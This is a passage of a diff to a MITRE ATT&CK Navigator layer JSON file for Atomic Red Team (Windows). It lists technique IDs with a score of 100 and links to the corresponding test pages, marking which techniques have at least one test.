techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/ato